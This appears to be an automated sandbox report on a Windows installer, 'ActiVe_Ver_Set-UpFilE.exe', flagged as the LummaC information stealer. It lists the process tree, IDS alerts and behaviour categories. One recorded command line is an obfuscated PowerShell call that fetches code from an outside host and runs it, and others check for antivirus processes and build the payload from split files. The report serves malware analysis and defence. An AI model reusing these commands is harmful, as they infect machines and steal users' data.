Windows
Analysis Report
ActiVe_Ver_Set-UpFilE.exe
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- ActiVe_Ver_Set-UpFilE.exe (PID: 7460 cmdline:
"C:\Users\ user\Deskt op\ActiVe_ Ver_Set-Up FilE.exe" MD5: 047187C8DC466A354ACB17192DE48BDD) - cmd.exe (PID: 7504 cmdline:
"C:\Window s\System32 \cmd.exe" /c move Bo at Boat.cm d & Boat.c md MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7520 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 7568 cmdline:
tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1) - findstr.exe (PID: 7584 cmdline:
findstr /I "opssvc w rsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E) - tasklist.exe (PID: 7612 cmdline:
tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1) - findstr.exe (PID: 7620 cmdline:
findstr "A vastUI AVG UI bdservi cehost nsW scSvc ekrn SophosHea lth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E) - cmd.exe (PID: 7664 cmdline:
cmd /c md 686105 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - extrac32.exe (PID: 7688 cmdline:
extrac32 / Y /E Atten d MD5: 9472AAB6390E4F1431BAA912FCFF9707) - findstr.exe (PID: 7712 cmdline:
findstr /V "molecula r" Awards MD5: F1D4BE0E99EC734376FDE474A8D4EA3E) - cmd.exe (PID: 7728 cmdline:
cmd /c cop y /b 68610 5\Challeng ed.com + R ecorded + Mtv + Comp anies + So nic + Fin + Wired + Quick + Oc cupation + Developme ntal + Shi eld 686105 \Challenge d.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - cmd.exe (PID: 7744 cmdline:
cmd /c cop y /b ..\Ap propriate + ..\China + ..\Dept h + ..\Kyl e + ..\Lat via + ..\T aught Q MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - Challenged.com (PID: 7760 cmdline:
Challenged .com Q MD5: 62D09F076E6E0240548C2F837536A46A) - powershell.exe (PID: 8152 cmdline:
powershell -exec byp ass [Net.s ervicepOIN TmANaGer]: :SEcURiTyP rOtoCOl = [Net.SecUr iTyprOtoco ltYPe]::tL s12; $gD=' https://df gh.online/ invoker.ph p?compName ='+$env:co mputername ; $pTSr = iWr -uRi $ gD -uSebAS IcpARsiNg -UsErAGent 'Mozilla/ 5.0 (Windo ws NT 10.0 ; Win64; x 64) AppleW ebKit/57.3 6 (KHTML, like Gecko ) Chrome/1 2.0.0.0 Sa fari/57.36 '; IEx $Pt sr.Content ; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 8164 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - choice.exe (PID: 7776 cmdline:
choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security | ||
JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): |
Source: | Author: frack113: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-15T15:53:43.715548+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49739 | 172.67.192.161 | 443 | TCP |
2025-01-15T15:53:45.033257+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49740 | 172.67.192.161 | 443 | TCP |
2025-01-15T15:53:46.808753+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49741 | 172.67.192.161 | 443 | TCP |
2025-01-15T15:53:48.265620+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49742 | 172.67.192.161 | 443 | TCP |
2025-01-15T15:53:49.926321+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49743 | 172.67.192.161 | 443 | TCP |
2025-01-15T15:53:51.924723+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49744 | 172.67.192.161 | 443 | TCP |
2025-01-15T15:53:53.027692+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49745 | 172.67.192.161 | 443 | TCP |
2025-01-15T15:53:54.272684+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49746 | 172.67.192.161 | 443 | TCP |
2025-01-15T15:53:56.533823+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49747 | 172.67.192.161 | 443 | TCP |
2025-01-15T15:53:57.681104+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49748 | 185.161.251.21 | 443 | TCP |
2025-01-15T15:53:58.609414+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49749 | 104.21.15.122 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-15T15:53:44.290831+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49739 | 172.67.192.161 | 443 | TCP |
2025-01-15T15:53:45.540209+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49740 | 172.67.192.161 | 443 | TCP |
2025-01-15T15:53:56.909493+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49747 | 172.67.192.161 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-15T15:53:44.290831+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49739 | 172.67.192.161 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-15T15:53:45.540209+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.4 | 49740 | 172.67.192.161 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-15T15:53:52.409824+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49744 | 172.67.192.161 | 443 | TCP |
Click to jump to signature section
AV Detection |
---|
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: |
Source: | Integrated Neural Analysis Model: |
Source: | Static PE information: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Directory queried: |
Source: | Code function: | 0_2_004062D5 | |
Source: | Code function: | 0_2_00402E18 | |
Source: | Code function: | 0_2_00406C9B |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Networking |
---|
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | File created: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | JA3 fingerprint: |
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Code function: | 0_2_004050CD |
Source: | Code function: | 0_2_004044A5 |
Source: | Code function: | 0_2_00403883 |
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior |
Source: | Code function: | 0_2_0040497C | |
Source: | Code function: | 0_2_00406ED2 | |
Source: | Code function: | 0_2_004074BB |
Source: | Dropped File: |
Source: | Code function: |
Source: | Static PE information: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Static PE information: |
Source: | Classification label: |
Source: | Code function: | 0_2_004044A5 |
Source: | Code function: | 0_2_004024FB |
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | Static PE information: |
Source: | WMI Queries: | ||
Source: | WMI Queries: |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Virustotal: | ||
Source: | ReversingLabs: |
Source: | File read: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Process created: |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Source: | Static file information: |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Data Obfuscation |
---|
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Code function: | 0_2_004062FC |
Source: | Static PE information: |
Source: | Code function: | 17_2_044736DA | |
Source: | Code function: | 17_2_044736DA |
Persistence and Installation Behavior |
---|
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | WMI Queries: |
Source: | System information queried: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | WMI Queries: |
Source: | Last function: | ||
Source: | Last function: |
Source: | Code function: | 0_2_004062D5 | |
Source: | Code function: | 0_2_00402E18 | |
Source: | Code function: | 0_2_00406C9B |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Code function: | 0_2_004062FC |
Source: | Process token adjusted: | Jump to behavior | ||
Source: | Process token adjusted: | Jump to behavior | ||
Source: | Process token adjusted: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Binary or memory string: |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Code function: | 0_2_00406805 |
Source: | Key value queried: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | WMI Queries: |
Stealing of Sensitive Information |
---|
Source: | File source: |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
